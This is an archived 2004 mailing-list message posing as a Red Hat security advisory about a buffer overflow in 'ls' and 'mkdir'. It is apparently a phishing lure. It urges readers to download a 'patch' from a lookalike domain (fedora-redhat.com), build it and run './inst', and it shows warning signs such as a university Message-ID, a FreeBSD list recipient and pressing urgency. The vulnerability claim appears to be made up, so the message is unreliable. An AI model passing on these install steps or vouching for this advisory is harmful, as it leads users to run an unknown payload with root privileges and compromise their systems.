Date: Sun, 24 Oct 2004 16:57:27 -0500 From: RedHat Security Team <security@redhat.com> To: freebsd-questions@freebsd.org Subject: RedHat: Buffer Overflow in "ls" and "mkdir" Message-ID: <200410242157.i9OLvRRt011248@2ens11.uta.edu>
next in thread | raw e-mail | index | archive | help
[logo_rh_home.png]
Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHat
A complete revision history is at the end of this file.
Dear RedHat user,
Redhat found a vulnerability in fileutils (ls and mkdir), that could
allow a remote attacker to execute arbitrary code with root
privileges. Some of the affected linux distributions include RedHat
7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2
and not only. It is known that *BSD and Solaris platforms are NOT
affected.
The RedHat Security Team strongly advises you to immediately apply the
fileutils-1.0.6 patch. This is a critical-critical update that you
must make by following these steps:
* First download the patch from the Security RedHat mirror: wget
www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz
* Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
* cd fileutils-1.0.6.patch
* make
* ./inst
Again, please apply this patch as soon as possible or you risk your
system and others` to be compromised.
Thank you for your prompt attention to this serious matter,
RedHat Security Team.
Copyright © 2004 Red Hat, Inc. All rights reserved.
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?200410242157.i9OLvRRt011248>